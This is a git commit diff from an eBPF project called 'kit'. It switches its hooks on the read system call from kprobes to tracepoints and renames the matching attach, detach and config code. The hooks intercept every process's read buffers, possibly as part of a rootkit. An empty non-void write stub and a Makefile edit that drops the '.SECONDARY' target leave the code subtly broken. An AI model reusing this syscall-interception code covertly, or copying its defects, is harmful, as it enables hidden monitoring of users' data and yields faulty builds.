Updated function and configurator manager names to the used hook.

2025-12-18 07:53:06 +08:00 · 2022-01-26 13:04:23 -05:00
parent 9b366810b5
commit 2b50d376a6
9 changed files with 758 additions and 756 deletions
--- a/src/.output/kit.bpf.o
+++ b/src/.output/kit.bpf.o
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
--- a/src/Makefile
+++ b/src/Makefile
@@ -104,5 +104,5 @@ $(APPS): %: $(OUTPUT)/%.o $(LIBBPF_OBJ) $(USER_INCLUDES_OBJ) | $(OUTPUT)
 .DELETE_ON_ERROR:

 # keep intermediate (.skel.h, .bpf.o, etc) targets
-.SECONDARY:
+SECONDARY:

--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/ebpf/include/bpf/fs.h
+++ b/src/ebpf/include/bpf/fs.h
@@ -41,7 +41,7 @@ struct sys_read_enter_ctx {
    size_t count;
 };

-static __always_inline int handle_sys_read(struct sys_read_enter_ctx *ctx, int fd, char* buf){
+static __always_inline int handle_tp_sys_enter_read(struct sys_read_enter_ctx *ctx, int fd, char* buf){
    __u64 pid_tgid = bpf_get_current_pid_tgid();
    __u32 pid = pid_tgid >> 32;
    struct fs_open_data data = {
@@ -54,12 +54,16 @@ static __always_inline int handle_sys_read(struct sys_read_enter_ctx *ctx, int f
    return 0;
 }

+static __always_inline int handle_sys_write(struct sys_read_enter_ctx *ctx, int fd, char* buf){
+
+}
+
 /**
 * @brief Receives read event and stores the parameters into internal map
 * 
 */
-SEC("tracepoint/syscalls/sys_enter_read") 
-int kprobe_ksys_read(struct sys_read_enter_ctx *ctx) { 
+SEC("tp/syscalls/sys_enter_read") 
+int tp_sys_enter_read(struct sys_read_enter_ctx *ctx) { 
    struct sys_read_enter_ctx *rctx = ctx; 
    if (ctx == NULL){
        bpf_printk("Error\n");
@@ -68,7 +72,7 @@ int kprobe_ksys_read(struct sys_read_enter_ctx *ctx) {

    int fd = (int) ctx->fd; 
    char *buf = (char*) ctx->buf; 
-    return handle_sys_read(ctx, fd, buf); 
+    return handle_tp_sys_enter_read(ctx, fd, buf); 
 } 

 /**
@@ -78,8 +82,8 @@ int kprobe_ksys_read(struct sys_read_enter_ctx *ctx) {
 * values. 
 * 
 */
-SEC("tracepoint/syscalls/sys_exit_read")
-int kretprobe_vfs_read(struct sys_read_exit_ctx *ctx){
+SEC("tp/syscalls/sys_exit_read")
+int tp_sys_exit_read(struct sys_read_exit_ctx *ctx){
    __u64 pid_tgid = bpf_get_current_pid_tgid();
    if(pid_tgid<0){
        //bpf_printk("Out\n");
--- a/src/user/include/modules/fs.h
+++ b/src/user/include/modules/fs.h
@@ -8,30 +8,30 @@
 #include "kit.skel.h"

 //Connections
-int attach_kprobe_ksys_read(struct kit_bpf *skel){
-    skel->links.kprobe_ksys_read = bpf_program__attach(skel->progs.kprobe_ksys_read);
-	return libbpf_get_error(skel->links.kprobe_ksys_read);
+int attach_tp_sys_enter_read(struct kit_bpf *skel){
+    skel->links.tp_sys_enter_read = bpf_program__attach(skel->progs.tp_sys_enter_read);
+	return libbpf_get_error(skel->links.tp_sys_enter_read);
 }
-int attach_kretprobe_vfs_read(struct kit_bpf *skel){
-    skel->links.kretprobe_vfs_read = bpf_program__attach(skel->progs.kretprobe_vfs_read);
-	return libbpf_get_error(skel->links.kretprobe_vfs_read);
+int attach_tp_sys_exit_read(struct kit_bpf *skel){
+    skel->links.tp_sys_exit_read = bpf_program__attach(skel->progs.tp_sys_exit_read);
+	return libbpf_get_error(skel->links.tp_sys_exit_read);
 }

 int attach_fs_all(struct kit_bpf *skel){
-    return attach_kprobe_ksys_read(skel) || attach_kretprobe_vfs_read(skel);
+    return attach_tp_sys_enter_read(skel) || attach_tp_sys_exit_read(skel);
 }


-int detach_kprobe_ksys_read(struct kit_bpf *skel){
-    int err = detach_link_generic(skel->links.kprobe_ksys_read);
+int detach_tp_sys_enter_read(struct kit_bpf *skel){
+    int err = detach_link_generic(skel->links.tp_sys_enter_read);
    if(err<0){
        fprintf(stderr, "Failed to detach fs link\n");
        return -1;
    }
    return 0;
 }
-int detach_kretprobe_vfs_read(struct kit_bpf *skel){
-    int err = detach_link_generic(skel->links.kretprobe_vfs_read);
+int detach_tp_sys_exit_read(struct kit_bpf *skel){
+    int err = detach_link_generic(skel->links.tp_sys_exit_read);
    if(err<0){
        fprintf(stderr, "Failed to detach fs link\n");
        return -1;
@@ -40,7 +40,7 @@ int detach_kretprobe_vfs_read(struct kit_bpf *skel){
 }

 int detach_fs_all(struct kit_bpf *skel){
-    return detach_kprobe_ksys_read(skel) || detach_kretprobe_vfs_read(skel);
+    return detach_tp_sys_enter_read(skel) || detach_tp_sys_exit_read(skel);
 }

 #endif
--- a/src/user/include/modules/module_manager.c
+++ b/src/user/include/modules/module_manager.c
@@ -14,8 +14,8 @@ module_config_t module_config = {
    },
    .fs_module = {
        .all = ON,
-        .kprobe_ksys_read = OFF,
-        .kretprobe_vfs_read = OFF
+        .tp_sys_enter_read = OFF,
+        .tp_sys_exit_read = OFF
    }

 };
@@ -57,8 +57,8 @@ int setup_all_modules(){
    if(config.fs_module.all == ON){
        ret = attach_fs_all(attr.skel);
    }else{
-        if(config.fs_module.kprobe_ksys_read == ON) ret = attach_kprobe_ksys_read(attr.skel);
-        if(config.fs_module.kretprobe_vfs_read == ON) ret = attach_kretprobe_vfs_read(attr.skel);
+        if(config.fs_module.tp_sys_enter_read == ON) ret = attach_tp_sys_enter_read(attr.skel);
+        if(config.fs_module.tp_sys_exit_read == ON) ret = attach_tp_sys_exit_read(attr.skel);
    }
    if(ret!=0) return -1;

--- a/src/user/include/modules/module_manager.h
+++ b/src/user/include/modules/module_manager.h
@@ -25,8 +25,8 @@ typedef struct module_config_t{

    struct fs_module {
        char all;
-        char kprobe_ksys_read;
-        char kretprobe_vfs_read;
+        char tp_sys_enter_read;
+        char tp_sys_exit_read;
    }fs_module;

 } module_config_t;